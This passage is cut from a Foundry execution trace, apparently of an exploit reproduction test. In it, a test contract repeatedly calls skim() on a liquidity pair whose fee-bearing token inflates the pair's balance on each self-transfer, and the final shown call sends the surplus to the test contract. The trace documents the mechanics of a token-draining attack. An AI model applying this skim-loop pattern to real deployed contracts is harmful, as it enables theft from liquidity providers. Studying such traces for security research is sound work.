    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1332561051519463 [1.332e15]
    │   │   │   │   └─ ← [Return] 1332561051519463 [1.332e15]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 956140853691423 [9.561e14])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 956140853691423 [9.561e14]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1332561051519463 [1.332e15]
    │   │   │   │   │   │   └─ ← [Return] 1332561051519463 [1.332e15]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 956140853691423 [9.561e14])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 20308431732405 [2.03e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 20308431732405 [2.03e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x14ea3f9ff4f2ea426f5bb01e89ab3823a503acab6f067aa45e2e44c54ee42074 → 0x152bfda0796abfd34a8e5f0cbdee8f65856049ae1c52123c5a4d252be4807a35
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x000000000000000000000000000000000000000000000000000483ebe41c3f5f → 0x0000000000000000000000000000000000000000000000000004bbf50c1e09e7
    │   │   │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000045dcadfc0035b9 → 0x0000000000000000000000000000000000000000000000000048bf7efe600221
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x14ea3f9ff4f2ea426f5bb01e89ab3823a503acab6f067aa45e2e44c54ee42074 → 0x152bfda0796abfd34a8e5f0cbdee8f65856049ae1c52123c5a4d252be4807a35
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1387609172930053 [1.387e15]
    │   │   │   │   └─ ← [Return] 1387609172930053 [1.387e15]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 1011188975102013 [1.011e15])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 1011188975102013 [1.011e15]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1387609172930053 [1.387e15]
    │   │   │   │   │   │   └─ ← [Return] 1387609172930053 [1.387e15]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 1011188975102013 [1.011e15])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 17443009820509 [1.744e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 17443009820509 [1.744e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x152bfda0796abfd34a8e5f0cbdee8f65856049ae1c52123c5a4d252be4807a35 → 0x15623788e6d38034eff7e4b82eb67933b65c60ef1ad91ce532da1c20767e4205
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x152bfda0796abfd34a8e5f0cbdee8f65856049ae1c52123c5a4d252be4807a35 → 0x15623788e6d38034eff7e4b82eb67933b65c60ef1ad91ce532da1c20767e4205
    │   │   │   │   │   │   @ 12: 0x0000000000000000000000000000000000000000000000000048bf7efe600221 → 0x000000000000000000000000000000000000000000000000004b3a11ae8aa8c5
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x0000000000000000000000000000000000000000000000000004bbf50c1e09e7 → 0x0000000000000000000000000000000000000000000000000004ee05efd6ee05
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1434890269521739 [1.434e15]
    │   │   │   │   └─ ← [Return] 1434890269521739 [1.434e15]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 1058470071693699 [1.058e15])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 1058470071693699 [1.058e15]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1434890269521739 [1.434e15]
    │   │   │   │   │   │   └─ ← [Return] 1434890269521739 [1.434e15]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 1058470071693699 [1.058e15])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 15548925353180 [1.554e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 15548925353180 [1.554e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000004b3a11ae8aa8c5 → 0x000000000000000000000000000000000000000000000000004d6fbc556f2b36
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x15623788e6d38034eff7e4b82eb67933b65c60ef1ad91ce532da1c20767e4205 → 0x1590f64b7beddf9d3ee4dc3fbf6f558a4814c934b0e3dc841ddf8c801c4e5a01
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x0000000000000000000000000000000000000000000000000004ee05efd6ee05 → 0x000000000000000000000000000000000000000000000000000519066cce774b
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x15623788e6d38034eff7e4b82eb67933b65c60ef1ad91ce532da1c20767e4205 → 0x1590f64b7beddf9d3ee4dc3fbf6f558a4814c934b0e3dc841ddf8c801c4e5a01
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1477037252702143 [1.477e15]
    │   │   │   │   └─ ← [Return] 1477037252702143 [1.477e15]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 1100617054874103 [1.1e15])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 1100617054874103 [1.1e15]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1477037252702143 [1.477e15]
    │   │   │   │   │   │   └─ ← [Return] 1477037252702143 [1.477e15]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 1100617054874103 [1.1e15])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 13438534240012 [1.343e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 13438534240012 [1.343e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000004d6fbc556f2b36 → 0x000000000000000000000000000000000000000000000000004f58a06fd24535
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x1590f64b7beddf9d3ee4dc3fbf6f558a4814c934b0e3dc841ddf8c801c4e5a01 → 0x15b835bbb2af15660d43297da5c43cb66bf55d2acfec11587b6d6f79de2188d5
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x1590f64b7beddf9d3ee4dc3fbf6f558a4814c934b0e3dc841ddf8c801c4e5a01 → 0x15b835bbb2af15660d43297da5c43cb66bf55d2acfec11587b6d6f79de2188d5
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x000000000000000000000000000000000000000000000000000519066cce774b → 0x00000000000000000000000000000000000000000000000000053f5b88c46fbf
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1513463800757262 [1.513e15]
    │   │   │   │   └─ ← [Return] 1513463800757262 [1.513e15]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 1137043602929222 [1.137e15])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 1137043602929222 [1.137e15]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1513463800757262 [1.513e15]
    │   │   │   │   │   │   └─ ← [Return] 1513463800757262 [1.513e15]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 1137043602929222 [1.137e15])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 12507479632221 [1.25e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 12507479632221 [1.25e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000000004f58a06fd24535 → 0x00000000000000000000000000000000000000000000000000511fa56b0abbce
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x15b835bbb2af15660d43297da5c43cb66bf55d2acfec11587b6d6f79de2188d5 → 0x15dbdbfd516b2a424386c7869ca27720bc4574ddf34df1e283c6aef8c88652e8
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x00000000000000000000000000000000000000000000000000053f5b88c46fbf → 0x0000000000000000000000000000000000000000000000000005607cc0397c0e
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x15b835bbb2af15660d43297da5c43cb66bf55d2acfec11587b6d6f79de2188d5 → 0x15dbdbfd516b2a424386c7869ca27720bc4574ddf34df1e283c6aef8c88652e8
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C)
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1547366628233416 [1.547e15]
    │   │   │   │   └─ ← [Return] 1547366628233416 [1.547e15]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 1170946430405376 [1.17e15])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 1170946430405376 [1.17e15]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1547366628233416 [1.547e15]
    │   │   │   │   │   │   └─ ← [Return] 1547366628233416 [1.547e15]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 1170946430405376 [1.17e15])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x16a17E12031Db06932cD3b2Eb7450112B7c91289, value: 10799053454413 [1.079e13])
    │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x3363Defd7447f14b7f696c0843AA96516Bc04808, value: 10799053454413 [1.079e13])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xdb16803f220d395e24f000d39eb2ca00d9475aa950bbd2a574e3c78e0373353d: 0x15dbdbfd516b2a424386c7869ca27720bc4574ddf34df1e283c6aef8c88652e8 → 0x15f9f7066988432d9b1c921649b412efe30d2ee82930cecbd05b98460ebd3e9f
    │   │   │   │   │   │   @ 0xea5dfa9b1f53a142bcd8a4323aad9ffbc282a9ede040128ec2dca6f5357b6941: 0x0000000000000000000000000000000000000000000000000005607cc0397c0e → 0x00000000000000000000000000000000000000000000000000057f525e3690c8
    │   │   │   │   │   │   @ 12: 0x00000000000000000000000000000000000000000000000000511fa56b0abbce → 0x0000000000000000000000000000000000000000000000000052a88370d827ed
    │   │   │   │   │   │   @ 0x6179dbd0cf728e0e0d51fc1f2237102b1e10a6ef7b1987d3b8e9c954f828bc98: 0x15dbdbfd516b2a424386c7869ca27720bc4574ddf34df1e283c6aef8c88652e8 → 0x15f9f7066988432d9b1c921649b412efe30d2ee82930cecbd05b98460ebd3e9f
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
    │   │   │   ├─ [3262] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::transfer(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, 0)
    │   │   │   │   ├─ emit Transfer(from: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, to: 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C, value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [39174] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::skim(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 1576638588447332 [1.576e15]
    │   │   │   │   └─ ← [Return] 1576638588447332 [1.576e15]
    │   │   │   ├─ [25794] 0x91383A15C391c142b80045D8b4730C1c37ac0378::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1200218390619292 [1.2e15])
    │   │   │   │   ├─ [25015] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1200218390619292 [1.2e15]) [delegatecall]
    │   │   │   │   │   ├─ [388] 0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C::totalSupply() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 72957050803213999 [7.295e16]
    │   │   │   │   │   ├─ [2725] 0x91383A15C391c142b80045D8b4730C1c37ac0378::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   ├─ [1949] 0xb276647E70CB3b81a1cA302Cf8DE280fF0cE5799::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [delegatecall]
    │   │   │   │   │   │   │   └─ ← [Return] 1576638588447332 [1.576e15]
    │   │   │   │   │   │   └─ ← [Return] 1576638588447332 [1.576e15]
    │   │   │   │   │   ├─ [534] 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2::balanceOf(0x694f8F9E0ec188f528d6354fdd0e47DcA79B6f2C) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 116989676722055111610 [1.169e20]
